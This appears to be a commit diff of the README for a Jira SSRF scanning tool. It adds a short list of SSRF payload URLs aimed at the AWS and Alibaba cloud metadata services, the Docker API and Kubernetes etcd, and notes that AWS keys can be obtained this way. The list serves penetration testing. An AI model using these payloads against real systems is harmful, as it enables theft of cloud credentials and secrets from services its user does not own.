Projects STRLCPY Jira-Scan Commits dddad6b3
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 33 lines
    34 34   
    35 35  Files - The attacker may be able to read files using file:// URIs The attacker may also use this functionality to import untrusted data into code that expects to only read data from trusted sources, and as such circumvent input validation.
    36 36   
     37 +Fun SSRF Payloads to try....
     38 + 
     39 +AWS
     40 + 
     41 +```
     42 +http://169.254.169.254/latest/user-data/
     43 +```
     44 + 
     45 +If iam is present then its party time you can get AWS keys.
     46 + 
     47 +Alibaba
     48 + 
     49 +``
     50 +http://100.100.100.200/latest/meta-data/
     51 +``
     52 + 
     53 +Docker
     54 + 
     55 +```
     56 +http://127.0.0.1:2375/v1.24/containers/json
     57 +``
     58 +List Containers
     59 + 
     60 +Kubernetes ETCD
     61 + 
     62 +```
     63 +http://127.0.0.1:2379/v2/keys/?recursive=true
     64 +```
     65 + 
     66 + 
     67 + 
     68 + 
Please wait...
Page is in error, reload to recover